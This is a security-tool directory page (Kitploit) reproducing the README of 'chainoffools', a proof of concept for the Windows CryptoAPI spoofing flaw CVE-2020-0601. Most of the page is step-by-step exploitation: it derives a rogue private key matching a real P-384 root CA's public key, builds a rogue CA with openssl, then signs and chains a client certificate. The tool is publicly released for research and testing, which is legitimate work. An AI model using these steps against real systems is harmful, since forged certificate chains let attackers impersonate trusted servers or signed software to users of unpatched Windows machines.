Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
chainoffools — A PoC for CVE-2020-0601 | Kitploit
Tools/GitHubGitHub/kudelskisecurity/chainoffools
Vulnerability AnalysisCode AnalysisExploitationCryptographyPenetration Testing
GitHubkudelskisecurity/chainoffools

chainoffools

A PoC for CVE-2020-0601

View Repository
335813 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CryptoAPI

CVE-2020-0601: Windows CryptoAPI Spoofing Vulnerability exploitation. More information in our blog post.

Install requirements

root@kitploit:~
pip install -U -r requirements.txt

The certificate generation works with OpenSSL verion up to 1.0.2u.

CA certificate

We used the USERTrust ECC Certification Authority but it can be any root certificate working on P-384 curve.

To generate a private key which match the public key from the root certificate we used the script gen-key.py (works with Python 3.6 and above):

root@kitploit:~
$ ./gen-key.py RootCert.pem 

The key can be displayed with:

root@kitploit:~
$ openssl ec -in p384-key-rogue.pem -text

Then to generate the rogue CA:

root@kitploit:~
$ openssl req -key p384-key-rogue.pem -new -out ca-rogue.pem -x509 -config ca.cnf -days 500

Then we generate the following private key and certificate:

root@kitploit:~
openssl ecparam -name prime256v1 -genkey -noout -out prime256v1-privkey.pem

openssl req -key prime256v1-privkey.pem -config openssl.cnf -new -out prime256v1.csr

openssl x509 -req -in prime256v1.csr -CA ca-rogue.pem -CAkey p384-key-rogue.pem -CAcreateserial -out client-cert.pem -days 500 -extensions v3_req -extfile openssl.cnf 

Finally to have the complete chain in a single file we concatenate the CA and the server certificates:

root@kitploit:~
cat client-cert.pem ca-rogue.pem > cert.pem
Download Tool